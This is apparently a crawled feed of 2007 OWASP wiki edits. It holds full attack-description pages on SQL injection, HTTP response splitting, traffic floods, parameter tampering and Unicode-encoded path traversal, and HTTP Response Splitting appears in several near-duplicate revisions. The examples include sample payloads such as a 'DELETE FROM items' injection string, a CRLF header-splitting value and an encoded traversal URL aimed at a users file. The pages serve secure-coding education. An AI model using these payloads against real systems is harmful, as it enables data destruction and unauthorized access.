* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&diff=22643&oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&action=history history])<br />
<br />
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&diff=22658&oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&action=history history])<br />
<br />
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&diff=22660&oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&action=history history])<br />
<br />
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&diff=22661&oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&action=history history])<br />
<br />
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&diff=22662&oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&action=history history])<br />
<br />
'''New items'''<br />
** [[Denial_of_Service]]<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Session_Prediction]]<br />
<br />
<br />
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])<br />
<br />
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&diff=22954&oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&action=history history])<br />
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&diff=22956&oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&action=history history])<br />
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&diff=22957&oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&action=history history])<br />
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&diff=22959&oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&action=history history])<br />
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&diff=22960&oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&action=history history])<br />
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&diff=22961&oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&action=history history])<br />
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&diff=22962&oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&action=history history])<br />
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&diff=22963&oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&action=history history])<br />
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&diff=22965&oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&action=history history])<br />
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&diff=22936&oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&action=history history])<br />
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&diff=22937&oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&action=history history])<br />
<br />
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):<br />
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&action=history history])<br />
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&action=history history])<br />
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&action=history history])</div>Nsravhttps://wiki.owasp.org/index.php?title=SQL_Injection&diff=23119SQL Injection2007-11-05T19:36:07Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
An [[SQL injection]] attack consists of insertion or "injection" of an SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. For an introduction to SQL Injection, please refer to the references at the bottom of the page.<br />
SQL injection attacks are another instantiation of an [[Top 10 2007-Injection Flaws | injection attack]], in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.<br />
<br />
SQL injection errors occur when:<br />
<br />
# Data enters a program from an untrusted source. <br />
# The data used to dynamically construct a SQL query <br />
<br />
The main consequences are:<br />
<br />
* Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with [[Glossary#SQL Injection|SQL Injection]] vulnerabilities.<br />
<br />
* Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.<br />
<br />
* Authorization: If authorization information is held in an SQL database, it may be possible to change this information through the successful exploitation of an [[Glossary#SQL Injection|SQL Injection]] vulnerability.<br />
<br />
* Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with an [[Glossary#SQL Injection|SQL Injection]] attack.<br />
<br />
<br />
The platform affected can be:<br />
<br />
* Language: SQL<br />
<br />
* Platform: Any (requires interaction with an SQL database)<br />
<br />
[[Glossary#SQL Injection|SQL Injection]] has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. <br />
<br />
Essentially, the attack is accomplished by placing a meta character into data input to then place SQL commands in the control plane, which did not exist there before. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.<br />
<br />
== Severity ==<br />
Medium to High<br />
<br />
== Likelihood of exploit ==<br />
Very High<br />
<br />
== Examples ==<br />
<br />
===Example 1===<br />
<br />
In SQL:<br />
<br />
<pre><br />
select id, firstname, lastname from authors<br />
</pre><br />
<br />
If one provided:<br />
<br />
<pre><br />
Firstname: evil'ex<br />
Lastname: Newman<br />
</pre><br />
<br />
the query string becomes:<br />
<br />
<pre><br />
select id, firstname, lastname from authors where forename = 'evil'ex' and surname ='newman'<br />
which the database attempts to run as <br />
</pre><br />
<br />
<pre><br />
Incorrect syntax near al' as the database tried to execute evil. <br />
</pre><br />
<br />
A safe version of the above SQL statement could be coded in Java as:<br />
<br />
<pre><br />
String firstname = req.getParameter("firstname");<br />
String lastname = req.getParameter("lastname");<br />
// FIXME: do your own validation to detect attacks<br />
String query = "SELECT id, firstname, lastname FROM authors WHERE forename = ? and surname = ?";<br />
PreparedStatement pstmt = connection.prepareStatement( query );<br />
pstmt.setString( 1, firstname );<br />
pstmt.setString( 2, lastname );<br />
try<br />
{<br />
ResultSet results = pstmt.execute( );<br />
}<br />
</pre><br />
<br />
===Example 2===<br />
<br />
The following C# code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.<br />
<br />
<pre><br />
...<br />
string userName = ctx.getAuthenticatedUserName();<br />
string query = "SELECT * FROM items WHERE owner = "'" <br />
+ userName + "' AND itemname = '" <br />
+ ItemName.Text + "'";<br />
sda = new SqlDataAdapter(query, conn);<br />
DataTable dt = new DataTable();<br />
sda.Fill(dt);<br />
...<br />
</pre><br />
<br />
The query that this code intends to execute follows:<br />
<br />
<pre><br />
SELECT * FROM items<br />
WHERE owner = <br />
AND itemname = ;<br />
</pre><br />
<br />
However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string "name' OR 'a'='a" for itemName, then the query becomes the following:<br />
<br />
<pre><br />
SELECT * FROM items<br />
WHERE owner = 'wiley'<br />
AND itemname = 'name' OR 'a'='a';<br />
</pre><br />
<br />
The addition of the OR 'a'='a' condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:<br />
<br />
<pre><br />
SELECT * FROM items;<br />
</pre><br />
<br />
This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.<br />
<br />
===Example 3===<br />
<br />
This example examines the effects of a different malicious value passed to the query constructed and executed in Example 1. If an attacker with the user name hacker enters the string "hacker'); DELETE FROM items; --" for itemName, then the query becomes the following two queries:<br />
<br />
<pre><br />
SELECT * FROM items <br />
WHERE owner = 'hacker'<br />
AND itemname = 'name';<br />
<br />
DELETE FROM items;<br />
<br />
--'<br />
</pre><br />
<br />
Many database servers, including Microsoft® SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.<br />
<br />
Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed [19]. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in Example 1. If an attacker enters the string "name'); DELETE FROM items; SELECT * FROM items WHERE 'a'='a", the following three valid statements will be created:<br />
<br />
<pre><br />
SELECT * FROM items <br />
WHERE owner = 'hacker'<br />
AND itemname = 'name';<br />
<br />
DELETE FROM items;<br />
<br />
SELECT * FROM items WHERE 'a'='a';<br />
</pre><br />
<br />
One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from a whitelist of safe values or identify and escape a blacklist of potentially malicious values. Whitelisting can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, blacklisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:<br />
<br />
* Target fields that are not quoted <br />
* Find ways to bypass the need for certain escaped meta-characters <br />
* Use stored procedures to hide the injected meta-characters <br />
<br />
Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.<br />
<br />
Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they fail to protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.<br />
<br />
<pre><br />
procedure get_item (<br />
itm_cv IN OUT ItmCurTyp,<br />
usr in varchar2,<br />
itm in varchar2)<br />
is<br />
open itm_cv for ' SELECT * FROM items WHERE ' ||<br />
'owner = '''|| usr || <br />
' AND itemname = ''' || itm || '''';<br />
end get_item;<br />
</pre><br />
<br />
Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.<br />
<br />
== External References ==<br />
<br />
*[http://www.greensql.net/ GreenSQL Open Source SQL Injection Filter]<br />
* [[Injection problem]]<br />
* [[Avoiding SQL Injection]]<br />
* [[Testing for SQL Injection]]<br />
<br />
<br />
==Related Threats==<br />
<br />
[[:Category:Command Execution]] <br />
<br />
<br />
==Related Attacks==<br />
<br />
*[[Blind SQL Injection]]<br />
<br />
*[[Code Injection]]<br />
<br />
*[[Double Encoding]]<br />
<br />
<br />
==Related Vulnerabilities==<br />
<br />
*[[:Category:Input Validation Vulnerability]]<br />
<br />
<br />
==Related Countermeasures==<br />
<br />
Avoidance and mitigation <br />
<br />
* Requirements specification: A non-SQL style database which is not subject to this flaw may be chosen.<br />
<br />
* Implementation: Use vigorous white-list style checking on any user input that may be used in an SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that has been entered in the database may neglect to escape meta-characters before use.<br />
<br />
* [[Image:Advanced Topics on SQL Injection Protection.ppt]]<br />
<br />
<br />
== Credit ==<br />
<br />
{{Template:SecureSoftware}}<br />
{{Template:Fortify}}<br />
<br />
[[Category:Injection Attack]]<br />
[[category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23117HTTP Response Splitting2007-11-05T19:25:17Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
HTTP response splitting vulnerabilities occur when:<br />
<br />
* Data enters a web application through an untrusted source, most frequently an HTTP request. <br />
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters. <br />
<br />
As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.<br />
<br />
To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.<br />
<br />
== Severity ==<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
Medium<br />
<br />
==Examples ==<br />
<br />
The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.<br />
<br />
<pre><br />
String author = request.getParameter(AUTHOR_PARAM);<br />
...<br />
Cookie cookie = new Cookie("author", author);<br />
cookie.setMaxAge(cookieExpiration);<br />
response.addCookie(cookie);<br />
</pre><br />
<br />
Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:<br />
<br />
<pre><br />
HTTP/1.1 200 OK<br />
...<br />
Set-Cookie: author=Jane Smith<br />
...<br />
</pre><br />
<br />
However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:<br />
<br />
<pre><br />
HTTP/1.1 200 OK<br />
...<br />
Set-Cookie: author=Wiley Hacker<br />
<br />
HTTP/1.1 200 OK<br />
...<br />
</pre><br />
<br />
Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.<br />
<br />
==External References==<br />
<br />
http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting<br />
<br />
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting<br />
<br />
<br />
==Related Threats==<br />
<br />
[[Client-side attacks]]<br />
<br />
<br />
==Related Attacks==<br />
<br />
*[[Cross-User Defacement]]<br />
*[[Cache Poisoning]]<br />
*[[Cross-Site Scripting]]<br />
*[[Page Hijacking]]<br />
<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Input Validation]]<br />
<br />
<br />
==Credit==<br />
<br />
{{Template:Fortify}}<br />
<br />
<br />
[[Category: Protocol Manipulation]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23115HTTP Response Splitting2007-11-05T18:57:09Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
HTTP response splitting vulnerabilities occur when:<br />
<br />
* Data enters a web application through an untrusted source, most frequently an HTTP request. <br />
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters. <br />
<br />
As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.<br />
<br />
To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.<br />
<br />
== Severity ==<br />
<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium<br />
<br />
<br />
<br />
==Examples ==<br />
<br />
The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.<br />
<br />
<pre><br />
String author = request.getParameter(AUTHOR_PARAM);<br />
...<br />
Cookie cookie = new Cookie("author", author);<br />
cookie.setMaxAge(cookieExpiration);<br />
response.addCookie(cookie);<br />
</pre><br />
<br />
Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:<br />
<br />
<pre><br />
HTTP/1.1 200 OK<br />
...<br />
Set-Cookie: author=Jane Smith<br />
...<br />
</pre><br />
<br />
However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:<br />
<br />
<pre><br />
HTTP/1.1 200 OK<br />
...<br />
Set-Cookie: author=Wiley Hacker<br />
<br />
HTTP/1.1 200 OK<br />
...<br />
</pre><br />
<br />
Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.<br />
<br />
<br />
== Severity ==<br />
<br />
<br />
<br />
<br />
== Likelihood of exploit ==<br />
<br />
<br />
<br />
<br />
==External References==<br />
<br />
http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting<br />
<br />
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting<br />
<br />
<br />
==Related Threats==<br />
<br />
[[Client-side attacks]]<br />
<br />
<br />
==Related Attacks==<br />
<br />
*[[Cross-User Defacement]]<br />
*[[Cache Poisoning]]<br />
*[[Cross-Site Scripting]]<br />
*[[Page Hijacking]]<br />
<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Input Validation]]<br />
<br />
<br />
==Credit==<br />
<br />
{{Template:Fortify}}<br />
<br />
<br />
[[Category: Protocol Manipulation]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23111HTTP Response Splitting2007-11-05T18:44:58Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
HTTP response splitting vulnerabilities occur when:<br />
<br />
* Data enters a web application through an untrusted source, most frequently an HTTP request. <br />
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters. <br />
<br />
As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.<br />
<br />
To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.<br />
<br />
== Severity ==<br />
<br />
<br />
<br />
== Likelihood of exploitation ==<br />
<br />
<br />
<br />
<br />
<br />
==Examples ==<br />
<br />
The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.<br />
<br />
<pre><br />
String author = request.getParameter(AUTHOR_PARAM);<br />
...<br />
Cookie cookie = new Cookie("author", author);<br />
cookie.setMaxAge(cookieExpiration);<br />
response.addCookie(cookie);<br />
</pre><br />
<br />
Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:<br />
<br />
<pre><br />
HTTP/1.1 200 OK<br />
...<br />
Set-Cookie: author=Jane Smith<br />
...<br />
</pre><br />
<br />
However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:<br />
<br />
<pre><br />
HTTP/1.1 200 OK<br />
...<br />
Set-Cookie: author=Wiley Hacker<br />
<br />
HTTP/1.1 200 OK<br />
...<br />
</pre><br />
<br />
Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.<br />
<br />
<br />
== Severity ==<br />
<br />
<br />
<br />
<br />
== Likelihood of exploit ==<br />
<br />
<br />
<br />
<br />
==External References==<br />
<br />
http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting<br />
<br />
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting<br />
<br />
<br />
==Related Threats==<br />
<br />
[[Client-side attacks]]<br />
<br />
<br />
==Related Attacks==<br />
<br />
*[[Cross-User Defacement]]<br />
*[[Cache Poisoning]]<br />
*[[Cross-Site Scripting]]<br />
*[[Page Hijacking]]<br />
<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Input Validation]]<br />
<br />
<br />
==Credit==<br />
<br />
{{Template:Fortify}}<br />
<br />
<br />
[[Category: Protocol Manipulation]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Traffic_flood&diff=23109Traffic flood2007-11-05T18:34:26Z<p>Nsrav: </p>
<hr />
<div>{{Template:attack}}<br />
<br />
==Description==<br />
<br />
Traffic Flood is a type of DoS attack targeting web servers, the attack explores the way that TCP connection is managed. The attack consists in a generation of a lot of well crafted TCP requisitions with the objective to stop the Web Server or causing a performance decrease.<br />
<br />
The attack explores the characteristic of the HTTP protocol, opening many connections at the same time to attend a single requisition. This special feature of the http protocol, which consists in to open a TCP connection for every html object and close it, could be used to make two different kinds of exploitation. <br />
The Connect attack is done during the establishment of the connection, and the Closing attack is done during the connection closing.<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Very High<br />
<br />
==Examples==<br />
<br />
===Connect attack===<br />
<br />
This type of attack consists in establishing a big number of fake TCP connections with an incomplete HTTP request until the web server is overwhelmed of connections and stops responding.<br />
<br />
The aim of the incomplete HTTP request is to keep the web server, with the TCP connection in Established state, waiting for the completion of the request, as shown in figure1. Depending on the implementation of the web server the connection stays in this state until there is a timeout of the TCP connection or of the web server. This way it’s possible to establish a great number of new connections before the first ones begin to timeout moreover the generation rate of new connections grows faster than the expiring one. <br />
<br />
<center><br />
<br />
https://www.owasp.org/images/b/b4/Trafficatual.jpg<br />
<br />
</center><br />
The attack could also affect firewall that implements a proxy like access control as Checkpoint FW1.<br />
<br />
===Closing Attack===<br />
<br />
The Closing Attack is done during the ending steps of a TCP connection exploring how some web servers deal with the finalization of the TCP connection especially with the FIN_WAIT_1 state.<br />
The attack as explained by Stanislav Shalunov: “ comes in two flavors: mbufs exhaustion and process saturation.<br />
<br />
When doing mbufs exhaustion, one wants the user-level process on the other end to write the data without blocking and close the descriptor. Kernel will have to deal with all the data, and the user-level process will be free, so that more requests can be sent this way and eventually consume all the mbufs or all physical memory, if mbufs are allocated dynamically.<br />
<br />
When doing process saturation, one wants user-level process to block while trying to write data. The architecture of many HTTP servers will allow serving only a number of connections at a time. When this number of connections is reached the server will stop responding to legitimate users. If the server doesn't put a bound on the number of connections,resources will still be tied up and eventually the machine comes to a crawling halt.<br />
<br />
== External References==<br />
<br />
* http://shlang.com/netkill/netkill.html<br />
<br />
==Related Threats==<br />
<br />
[[:Category:Logical Attacks]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Denial of Service]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:General Logic Error Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Denial of Service Attack]]<br />
<br />
<br />
<br />
[[Category:Protocol Manipulation]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=File:Trafficatual.jpg&diff=23105File:Trafficatual.jpg2007-11-05T18:20:52Z<p>Nsrav: </p>
<hr />
<div></div>Nsravhttps://wiki.owasp.org/index.php?title=Web_Parameter_Tampering&diff=23104Web Parameter Tampering2007-11-05T18:14:32Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
Web Parameter Tampering attack is based on manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields and URL Query Strings and is used to increase application functionality and control.<br />
<br />
This attack can be performed in the context of a malicious user who wants exploit the application for its own behalf or an attacker who whishes to attack a third-person using Man in the Middle attack. In both cases, tools likes Webscarab and Parosproxy are mostly used.<br />
<br />
The attack success depends on integrity and logic validation mechanisms errors and its exploitation can result on others consequences including XSS, SQL Injection, file inclusion and path disclosure attacks.<br />
<br />
== Severity ==<br />
<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
<br />
Very High<br />
<br />
==Examples ==<br />
<br />
=== Example 1===<br />
<br />
The parameter modification of form fields can be considered a typical example of Web Parameter Tampering attack. <br />
<br />
For example, consider a user can select form fields values (combo box, check box, etc.) on an application page. When these values are submitted by user, they could be acquired and arbitrarily manipulated by an attacker.<br />
<br />
=== Example 2===<br />
<br />
When a web application uses hidden fields to store status information, a malicious user can tamper the values stored on his browser and change the referred information. For example, an e-commerce shopping site uses hidden fields to refer its items, as follows:<br />
<br />
<input type=”hidden” id=”1008” name=”cost” value=”70.00”><br />
<br />
In this example, an attacker can modify the “value” information of a specific item, thus lowering its costs.<br />
<br />
=== Example 3===<br />
<br />
An attacker can tamper URL parameters directly. For example, consider a web application that permits user to select his profile from a combo box and debit the account:<br />
<br />
<nowiki>http://www.attackbank.com/default.asp?profile=741&debit=1000</nowiki><br />
<br />
In this case, an attacker could tamper that URL using other values for profile and debit:<br />
<br />
<nowiki>http://www.attackbank.com/default.asp?profile=852&debit=2000</nowiki><br />
<br />
Other parameters can be changed including attribute parameters. In the following example, it’s possible to tamper status variable and delete a page from the server:<br />
<br />
<nowiki>http://www.attackbank.com/savepage.asp?nr=147&status=read</nowiki><br />
<br />
Modifying status variable to delete the page:<br />
<br />
<nowiki>http://www.attackbank.com/savepage.asp?nr=147&status=del</nowiki><br />
<br />
==External References==<br />
<br />
http://cwe.mitre.org/data/definitions/472.html - Web Parameter Tampering<br />
<br />
http://www.imperva.com/application_defense_center/glossary/parameter_tampering.html - Parameter Tampering Imperva - Application Defense Center<br />
<br />
http://www.cgisecurity.com/owasp/html/ch11s04.html - Parameter Manipulation - Chapter 11. Preventing Common Problems<br />
<br />
==Related Threats==<br />
<br />
[[:Category:Client-side Attacks]]<br />
<br />
[[:Category:Logical Attacks]]<br />
<br />
==Related Attacks==<br />
<br />
*[[SQL Injection]]<br />
<br />
*[[XSS Attacks]]<br />
<br />
*[[Path Traversal]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category: Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category: Input Validation Vulnerability]]<br />
<br />
<br />
[[Category: Injection]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Unicode_Encoding&diff=23094Unicode Encoding2007-11-05T17:57:35Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
The attack aims to explore flaws in the decode mechanism implemented on applications when decoding Unicode data format. An attacker can use this technique to encode certain characters in the URL to bypass application filters, thus accessing restricted resources on the Web server or force browsing to protected pages.<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
High<br />
<br />
==Examples ==<br />
<br />
Consider a web application that has restricted directories or files (e.g. a file containing application usernames: appusers.txt). An attacker can encode the character sequence “../” (Path Traversal Attack) using Unicode format and attempt to access the protected resource, as follows:<br />
<br />
Original Path Traversal attack URL (without Unicode Encoding):<br />
<br />
<nowiki>http://vulneapplication/../../appusers.txt</nowiki><br />
<br />
Path Traversal attack URL with Unicode Encoding:<br />
<br />
<nowiki>http://vulneapplication/%C0AE/%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt</nowiki><br />
<br />
The Unicode encoding for the URL above will produce the same result as the first URL (Path Traversal Attack). However, if the application has certain input security filter mechanism, it could refuse any request containing “../” sequence, thus blocking the attack. However, if this mechanism doesn’t consider character encoding, the attacker can bypass and access protected resource.<br />
<br />
Other consequences of this type of attack are privilege escalation, arbitrary code execution, data modification and denial of service.<br />
<br />
==External References ==<br />
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884 - CVE-2000-0884<br />
<br />
http://capec.mitre.org/data/definitions/71.html - Using Unicode Encoding to Bypass Validation Logic<br />
<br />
http://www.microsoft.com/technet/security/bulletin/MS00-078.mspx - Patch Available for 'Web Server Folder Traversal' Vulnerability<br />
<br />
http://www.kb.cert.org/vuls/id/739224 - HTTP content scanning systems full-width/half-width Unicode encoding bypass<br />
<br />
http://scissec.scis.ecu.edu.au/conferences2007/documents/cheong_kai_wai_1.pdf - Penetration testing of cross site scripting and SQL injection on web application by Cheong Kai Wee <br />
<br />
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html - URL encoded attacks, by Gunter Ollmann <br />
<br />
==Related Threats==<br />
<br />
[[:Category:Command Execution]]<br />
<br />
